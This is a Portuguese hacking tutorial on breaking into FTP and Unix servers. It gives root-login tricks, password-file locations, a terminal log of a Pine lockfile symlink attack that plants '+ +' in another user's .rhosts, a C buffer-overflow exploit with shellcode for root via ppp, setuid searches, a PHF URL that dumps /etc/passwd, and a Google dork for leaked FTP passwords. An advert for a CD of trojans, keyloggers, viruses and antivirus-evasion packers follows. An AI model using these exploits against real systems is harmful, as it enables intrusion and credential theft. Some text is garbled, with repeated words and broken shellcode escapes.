/etc/shadow, e as vezes ela esta -r (No read) para os Users normais.
Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las.
O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para
você. Normalmente /etc/shadow está escondido como /etc/.shadow
Diretórios que começam com ponto “.” São diretórios ocultos.
Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar
com outro nome.
/etc/shadow/etc/shadow/etc/shadow/etc/shadow
podem conter senhas como vimos anteriormente
/etc/group/etc/group/etc/group/etc/group
Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
/usr/adm/loginlog
Aqui ficam os Logs, horários de entradas e saídas dos usuários.
As vazes podem estar em /usr/adm/acct/loginlog
E as vezes nem é encontrado, alguns servidores desativam este serviço.
/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :/usr/mail/<nomedousuario> :
Aqui fica o MAIL do usuário, para você ler esse arquivo você tem de
ser o root ou o próprio usuário.
/upload ou /cache/upload ou /cache/upload ou /cache/upload ou /cache
Aqui ficam gravados arquivos temporários que os usuários ou mesmo o
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou
a cada semana. Em muitos servers nao existe esse diretório.
/bin :/bin :/bin :/bin :
Neste diretório ficam os comandos do server e as shells. Cuidado.
SENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITSSENHAS E EXPLOITS
Login anônimo
user: anonymous
pass: eu@dominio
Logar como root (somente em servidores com falha)
quote user ftp
quote cwd ~root
quote pass ftp
quote user ftp
quote cwd ~sys
quote pass ftp
quote user ftp
quote cwd ~sysop
quote pass ftp
Diretorio das senhas :
(As senhas estarão criptografadas)
/etc/passwd
.shadow (procure este diretório oculto)
Decriptografando uma senha
Exemplo de senha criptografada:
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp
Quebrando uma senha de FTP
Quando você não pode acessar o arquivo passwd.txt e não consegue a senha criptogafada,
significa que a segurança do servidor é muito boa ou você é muito ruim =)
Ai só usando os métodos Lamer um deles é o Brute Force.
Brute force significa “força bruta” existem vários programas de brute force, o funcionamento é
simples, o programa gera inúmeras combinações de senhas até achar uma que logue. Você
também pode usar uma “Word list” (uma lista com as senhas mais comuns) junto com o Bute
Force. Um exemplo de programa é o Brutus
Exploits UNIX
Exploiter sem duvida é a melhor forma de hackear um servidor, mas é muito mais complicado, é
impossível você entender um exploiter se você não souber programar.
Um exploit é um programa que você cria e faz ele rodar dentro do servidor exploranda falhas e te
levando á root.
Eu achei um ótimo exemplo de exploit que roda via telnet, é o PINE EXPLOIT
Vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela
de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contém. Agora precisa fazer um " echo "+ +" >
/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00
grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse é o ultimo que vou relacionar aqui.
Exploitation script para vunerabilidade ppp.
#include #include #include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eaxn"); }
main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL;
char execshell[] =
"xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f" /* 16 bytes */
"x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52" /* 16 bytes */
"x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01" /* 20 bytes */
"x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i); ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i];
addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr; *ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root.
Dicas de exploits em UNIX
Estes são exploits usando comandos básicos de Unix, eu nem chamaria de exploits mas é legal
para começar a estudar.
Procurar por arquivos ocultos
find / -name ".. " -print -xdev
find / -name ".*" -print -xdev |cat -v
Procurar por todos os diretórios com permissão de gravar (R)
find / -perm -0777 -type -d -ls
Procurando arquivos setuid no filesystem
Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -perm -4000
find / -type f -perm -4000 -exec ls -l {} ;
Procurar por todos os arquivos setgid no filesystem.
find / -group root -perm -2000 -exec ls -ldb {} ;
BUG de PHF
Este exploit é muito antigo, muito dificio achar um servidor desatualizado.
Basta colocar o exploit no seu navegador.Exploit:
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo:
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Principais Falhas de FTP
- Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas
faciomente com um sniffer.
- Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google
consegue localizar estes arquivos, por exemplo:
Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos.
- Tem gente que ainda deixa root sem senha
- Como os navegadores interagem com FTP, link de download direto, você pode invadir um
FTP e “linkar” os arquivos para download, tipo:
ftp://dominio/diretorios/arquivo
Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root
Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar
informação.
Se quiserem entrar em contato comigo para tirar alguma dúvida:
Email:
rackerox@webexploiter.com
MSN
rackerox@hotmail.com
Praga de Orkut:
http://www.orkut.com/Profile.aspx?uid=4380671928865807152
CD ROOM HACKING TOOLS
O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática.
Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação,
Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os
tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba
senha com KL e invadir por cookies =)
No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu
funcionamento.
Para comprar o CD entre no site:
www.cdhackingtools.com
Conteudo do CD:
Redes/Internet
-Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta
-Programas para conexão remota ( com suporte para diferentes roteadores )
-Faça uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou através da Internet.
-Altere o seu endereço MAC
-Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email.
-Verifique o status de qualquer servidor na internet
-Faça do seu computador um servidor de internet.
-Capture todas as informações do tráfego de sua rede/conexão.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de
wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... são vários programas de snifers, scans, telnet, etc.
Exploiters/Scans
Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das
vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos
(ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas.
Trojans Backdoors
Um meio secreto ou não documentado de invadir um sistema de computador .
Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma
porta para um possível invasor.
Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro
arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir
deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas
operações no computador da vítima.
Resumindo :
Servidor é o vírus trojan que vai se instalar no pc da vítima
Cliente é o programa que esta no seu pc
E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP
Keyloggers
Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo
o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a
um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
Bruteforces
(Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação
destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja
encontrado.Ferramentas para força bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom
IP Scans
Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica.
Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas
portas. Faça scans até de IP que não respondem ao ping.
Procure trojans instalados em uma determinada faixa de IP.
Nuckers
Nuke é o nome atribuído a programas que finalizam
prematuramente com uma conexão TCP através do envio
de pacotes ICMP com mensagens de erro. Tais pacotes
podem ser direcionadas para o servidor (server side nuke)
ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com a
conexão fazendo com que o cliente ou o servidor sejam
enganados por uma mensagem de erro que normalmente
indicaria um problema de conexão entre os dois.
Binders
Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila
a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e
personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são
automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a
sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado
Criptografia
Programas de codificação e Decodificação de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.
Programaçao
O CD contem varias ferramentas de programação.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalação etc.
Compiladores
Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em
linguagem de máquina, gerando o binário que pode ser executado.
No CD contem compiladores de C C++ Assesmbler Perl
Resource
Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode
mudar caixas de diálogo, ícones e outras coisas.
Conversores
Corverta vários formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash,
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).
Compressores
Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional
permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o
antivirus não detecte.
Compactadores
São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No
cd contem os programas Winrar, Winzip e UPX
Ferramentas web
Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .
Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco,
manutenção do sistema, proteção de arquivos, etc.
Vírus
Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de
acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus
Builders, arquivos de batch.
Msn/orkut
São mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vídeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood.
Faça um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibição, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automática quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de
pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.
Servidores
Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,
SSH e PERL.
Hospede seu site em seu próprio computador.
Clientes
Programas que acessam os serviços de um servidor. Telnet, SSH
Segurança
Programas para ajudar na sua segurança, não um kit de anti vírus.
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares,
Monitore a segurança de seu computador à distancia.
Crie um emulador de terminal Telnet e SSH.
Ferramentas gerais
Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan,
gerenciador de uploads
Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windows
Sistemas operacionais
Programas que rodam do pen drive
Códigos fontes do:
Secure Internet Communication Suíte.
Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
EQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERS
A Hall of Hackers foi criada em dezembro de 2006.
Nosso intuito NÃO é promover nenhum tipo de prática maliciosa.
O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall
of Hackers somos inteiramente a favor da liberdade de informação.
Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou
seja, quem realmente estuda.
Nossa comunidade
http://www.orkut.com/Community.aspx?cmm=22006772
NOSSOS PROGETOS:
Orkut Community Hall of Hackers
CD Room de Softwares www.cdhackingtools.com
Scan On Line www.webexploiter.com
Blog Hacking http://insecuritynet.blogspot.com
Invasão de servidor ftp

Mais conteúdo relacionado

Destaque

Produção e Programação da Rede Minas - Desafios e Perspectivas
Produção e Programação da Rede Minas - Desafios e PerspectivasProdução e Programação da Rede Minas - Desafios e Perspectivas
Produção e Programação da Rede Minas - Desafios e Perspectivas
Rede Minas
 
Renovação de Convênio de Afiliação
Renovação de Convênio de AfiliaçãoRenovação de Convênio de Afiliação
Renovação de Convênio de Afiliação
Rede Minas
 
Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao
gleydsonslim
 
Sistema de informes internet
Sistema de informes   internetSistema de informes   internet
Sistema de informes internet
econodianaj
 
Efa gestredesinfor
Efa gestredesinforEfa gestredesinfor
Efa gestredesinfor
Alvaro Gomes
 
Control de calidad de la empresa coca cola
Control de calidad de la empresa coca colaControl de calidad de la empresa coca cola
Control de calidad de la empresa coca cola
lideres4a
 
Proceso productivo coca cola
Proceso productivo   coca colaProceso productivo   coca cola
Proceso productivo coca cola
marceastrada007
 
Proceso productivo de la leche
Proceso productivo de la lecheProceso productivo de la leche
Proceso productivo de la leche
marceastrada007
 

Destaque (19)

Projeto Copa Clio 2008
Projeto Copa Clio 2008Projeto Copa Clio 2008
Projeto Copa Clio 2008
 
Produção e Programação da Rede Minas - Desafios e Perspectivas
Produção e Programação da Rede Minas - Desafios e PerspectivasProdução e Programação da Rede Minas - Desafios e Perspectivas
Produção e Programação da Rede Minas - Desafios e Perspectivas
 
Renovação de Convênio de Afiliação
Renovação de Convênio de AfiliaçãoRenovação de Convênio de Afiliação
Renovação de Convênio de Afiliação
 
Protocólo FTP
Protocólo FTPProtocólo FTP
Protocólo FTP
 
Segurança de sistema firewall
Segurança de sistema   firewallSegurança de sistema   firewall
Segurança de sistema firewall
 
Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao Ferramentas livres para teste de invasao
Ferramentas livres para teste de invasao
 
Sistema de informes internet
Sistema de informes   internetSistema de informes   internet
Sistema de informes internet
 
Efa gestredesinfor
Efa gestredesinforEfa gestredesinfor
Efa gestredesinfor
 
Paradigmas de programação
Paradigmas de programaçãoParadigmas de programação
Paradigmas de programação
 
Informe sobre el Sistema de Gestión Medioambiental - Coca-Cola
Informe sobre el Sistema de Gestión Medioambiental - Coca-ColaInforme sobre el Sistema de Gestión Medioambiental - Coca-Cola
Informe sobre el Sistema de Gestión Medioambiental - Coca-Cola
 
FTP - File Transfer Protocol
FTP - File Transfer ProtocolFTP - File Transfer Protocol
FTP - File Transfer Protocol
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
 
Control de calidad de la empresa coca cola
Control de calidad de la empresa coca colaControl de calidad de la empresa coca cola
Control de calidad de la empresa coca cola
 
Proceso productivo coca cola
Proceso productivo   coca colaProceso productivo   coca cola
Proceso productivo coca cola
 
Proceso productivo de la leche
Proceso productivo de la lecheProceso productivo de la leche
Proceso productivo de la leche
 
6 Foodie Vacations You Should Take In 2016
6 Foodie Vacations You Should Take In 2016 6 Foodie Vacations You Should Take In 2016
6 Foodie Vacations You Should Take In 2016
 
How to Save on Holiday Travel
How to Save on Holiday TravelHow to Save on Holiday Travel
How to Save on Holiday Travel
 
Travel Tech Trends 2016
Travel Tech Trends 2016Travel Tech Trends 2016
Travel Tech Trends 2016
 
Visual Design with Data
Visual Design with DataVisual Design with Data
Visual Design with Data
 

Semelhante a Invasão de servidor ftp

O protocolo ftp (file transfer protocol)
O protocolo ftp (file transfer protocol)O protocolo ftp (file transfer protocol)
O protocolo ftp (file transfer protocol)
ErikHR
 
Apostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em LinuxApostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em Linux
eliezer
 
Apostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em LinuxApostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em Linux
guest7a481e8
 
Aula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldapAula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldap
Roberto Castro
 

Semelhante a Invasão de servidor ftp (20)

Comandos linux
Comandos linuxComandos linux
Comandos linux
 
O protocolo ftp (file transfer protocol)
O protocolo ftp (file transfer protocol)O protocolo ftp (file transfer protocol)
O protocolo ftp (file transfer protocol)
 
(14) ftp
(14) ftp(14) ftp
(14) ftp
 
Apostila internet
Apostila internetApostila internet
Apostila internet
 
Trabalho fin
Trabalho finTrabalho fin
Trabalho fin
 
Comandos do linux
Comandos do linuxComandos do linux
Comandos do linux
 
Python CGI
Python CGIPython CGI
Python CGI
 
Servidores linux
Servidores linuxServidores linux
Servidores linux
 
T R A N S FÊ R E N C I A D E F I C H E I R O S ( F T P) Power Point
T R A N S FÊ R E N C I A  D E  F I C H E I R O S ( F T P) Power PointT R A N S FÊ R E N C I A  D E  F I C H E I R O S ( F T P) Power Point
T R A N S FÊ R E N C I A D E F I C H E I R O S ( F T P) Power Point
 
DNS – domain name system
DNS – domain name systemDNS – domain name system
DNS – domain name system
 
Manual UFCD 0839.pptx
Manual UFCD 0839.pptxManual UFCD 0839.pptx
Manual UFCD 0839.pptx
 
Tutorial servidor debian linux ocs invetory
Tutorial servidor debian linux ocs invetory Tutorial servidor debian linux ocs invetory
Tutorial servidor debian linux ocs invetory
 
Configurando o ftp - ubuntu server
Configurando o ftp - ubuntu serverConfigurando o ftp - ubuntu server
Configurando o ftp - ubuntu server
 
Apostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em LinuxApostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em Linux
 
Apostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em LinuxApostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em Linux
 
Apostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em LinuxApostila Treinamento AvançAdo Em Linux
Apostila Treinamento AvançAdo Em Linux
 
Como funciona a Internet - DNS
Como funciona a Internet - DNSComo funciona a Internet - DNS
Como funciona a Internet - DNS
 
Como migrar seu ambiente de desenvolvimento para Linux
Como migrar seu ambiente de desenvolvimento para LinuxComo migrar seu ambiente de desenvolvimento para Linux
Como migrar seu ambiente de desenvolvimento para Linux
 
Aula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldapAula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldap
 
Comandos básicos linux
Comandos básicos linuxComandos básicos linux
Comandos básicos linux
 

Último

Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
Dirceu Resende
 

Último (7)

EAD Curso - CIÊNCIA DE DADOS NA INDÚSTTRIA
EAD Curso - CIÊNCIA DE DADOS NA INDÚSTTRIAEAD Curso - CIÊNCIA DE DADOS NA INDÚSTTRIA
EAD Curso - CIÊNCIA DE DADOS NA INDÚSTTRIA
 
Entrevistas, artigos, livros & citações de Paulo Pagliusi
Entrevistas, artigos, livros & citações de Paulo PagliusiEntrevistas, artigos, livros & citações de Paulo Pagliusi
Entrevistas, artigos, livros & citações de Paulo Pagliusi
 
Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
Apresentação Power Embedded - Descubra uma nova forma de compartilhar relatór...
 
Palestras sobre Cibersegurança em Eventos - Paulo Pagliusi
Palestras sobre Cibersegurança em Eventos - Paulo PagliusiPalestras sobre Cibersegurança em Eventos - Paulo Pagliusi
Palestras sobre Cibersegurança em Eventos - Paulo Pagliusi
 
From_SEH_Overwrite_with_Egg_Hunter_to_Get_a_Shell_PT-BR.pdf
From_SEH_Overwrite_with_Egg_Hunter_to_Get_a_Shell_PT-BR.pdfFrom_SEH_Overwrite_with_Egg_Hunter_to_Get_a_Shell_PT-BR.pdf
From_SEH_Overwrite_with_Egg_Hunter_to_Get_a_Shell_PT-BR.pdf
 
[ServiceNow] Upgrade de versão - 2ª edição (Revisada, atualizada e ampliada)
[ServiceNow] Upgrade de versão - 2ª edição (Revisada, atualizada e ampliada)[ServiceNow] Upgrade de versão - 2ª edição (Revisada, atualizada e ampliada)
[ServiceNow] Upgrade de versão - 2ª edição (Revisada, atualizada e ampliada)
 
Apostila e caderno de exercicios de WORD
Apostila e caderno de exercicios de  WORDApostila e caderno de exercicios de  WORD
Apostila e caderno de exercicios de WORD
 

Invasão de servidor ftp

  • 1.
  • 2. CONTEUDO O que é FTP - Conceitos básicos - Cliente/Servidor - Porta padrão - Como conectar - Comandos - TraDução de nome de arquivos - Mensagens FTP Servidor alvo - Sobre o servidor que envia dados para NASA Visualizando o servidor FTP com proxy - Webexploiter - Como pegar o IP do servidor - Procurando portas abertas - Visualizando FTP de uma forma segura Visualizando os arquivos do FTP diretamente de seu computador - Como pegar o IP - Verificando se a porta 21 está aberta - Logando no servidor - Definindo um diretório local - Listando diretórios - Abrindo diretórios e listando arquivos - Procurando arquivos ocultos - Baixando arquivos do servidor - Enviando arquivo para o servidor - Visualizando o arquivo do Banner - Analisando os arquivos - Restrições Enviando comandos diretamente para o servidor - Entendendo os comandos - Logando no Sistema - Sistema operacional - Conexão de Dados - Comandos que utilizam conexão de dados FTP via TELNET - Conexão direta com o servidor - Conexão de rede via FTP - Como criar uma conexão de rede com o servidor FTP UNIX - Usuários - Navegação - Principais comandos UNIX - Modificando os permissões - Principais diretórios - Senhas e Exploits - Login anônimo - Logar como root - Diretório das senhas - Decriptografando uma senha - Quebrando uma senha - Exploits UNIX - BuG DE PHF - Principais Falhas de FTP
  • 3. PREFÁCIOPREFÁCIOPREFÁCIOPREFÁCIO Atualmente invadir um servidor de FTP não é mais uma tarefa facio. Os sistemas operacionais, protocolos evoluíram, muitos bugs foram corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas, formas de invasão. O que não existe mais são as formulas prontas do tipo “use este script que você esta dentro do servidor” Para você conseguir entrar em um servidor FTP, antes de tudo você precisa saber como ele funciona, quais as vulnerabilidades do servidor e de seu sistema operacional, conhecer a fundo o protocolo FTP, seus comandos, ou seja, é preciso realmente estudar. O propósito desta apostila é este, estudar o funcionamento e vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que envia dados para NASA como exemplo, deixei tudo passo a passo como logar e navegar no servidor, porem quero deixar claro que não tem nada de ilegal, o servidor tem suas proteções como veremos mais adiante. Não estou promovendo nenhum tipo de crime virtual, usem isto para aumentar seu conhecimento em segurança, lembrando que se você mudar um byte de um servidor que você não tem autorização é crime. Rackerox rackerox@hotmail.com
  • 4. O QUE É FTP FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet. Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu computador. Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais se você estiver logado o FTP você poderá mudar os arquivos Primeiramente vamos entender alguns conceitos. Para existir uma comunicação entre computadores é necessário: -Um endereço de cada computador (IP) -Um linguagem que os dois computadores entendam ( protocolos) -Como são vários serviços ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada serviço precisa ter uma porta especifica, caso contrario os dados de um serviço iriam ser recebidos por outros. Cliente / Servidor Sem complicar...o conceito é simples: Cliente é o seu programa de ftp que esta no seu computador. Servidor é o que está hospedado junto com o site. (você também pode criar um servidor em seu computador) O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo transferido. Estes dados são transferidos do servidor para o cliente e vice e versa. Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O encerramento da conexão indica o fim do arquivo. Porta padrão A porta padrão para FTP é a porta 21 Como conectar Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando, funcionam no MS-DOS ou no Prompt de Comando no windows. Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este programa não tem interface gráfica, ele roda no Prompt de comando. Para abrir o prompt de comando vá em executar e digite cmd. Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você esta com o programa aberto, é preciso aprender os comandos. Comandos FTP Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos hospedados.
  • 5. COMANDO SINTAXE DESCRIÇÃO ! ! COMANDO Executa COMANDO na máquina local. No prompt do ftp, os comandos digitados são, a princípio, executados na máquina remota. Para executar um comando na máquina local preceda o mesmo com o ! ascii ascii Configura o tipo de transferência de arquivos para ASCII. É o valor padrão bell bell Emite um bip quando um comando é completado binary binary Configura o tipo de transferência de arquivos para binário. bye bye Encerra a sessão ftp e retorna ao interpretador de comandos cd cd DIRETÓRIO Muda o diretório de trabalho para DIRETÓRIO cdup cdup Muda para o diretório que está um nível acima do diretótio atual chmod chmod MODO ARQUIVO Altera as permissões de ARQUIVO de acordo com MODO. close close Encerra a sessão ftp e retorna ao interpretador de comandos delete delete ARQUIVO Apaga ARQUIVO dir dir DIRETÓRIO ARQUIVO-LOCAL Lista o conteúdo de DIRETÓRIO colocando o resultado em ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se DIRETÓRIO não for especificado, será listado o conteúdo do 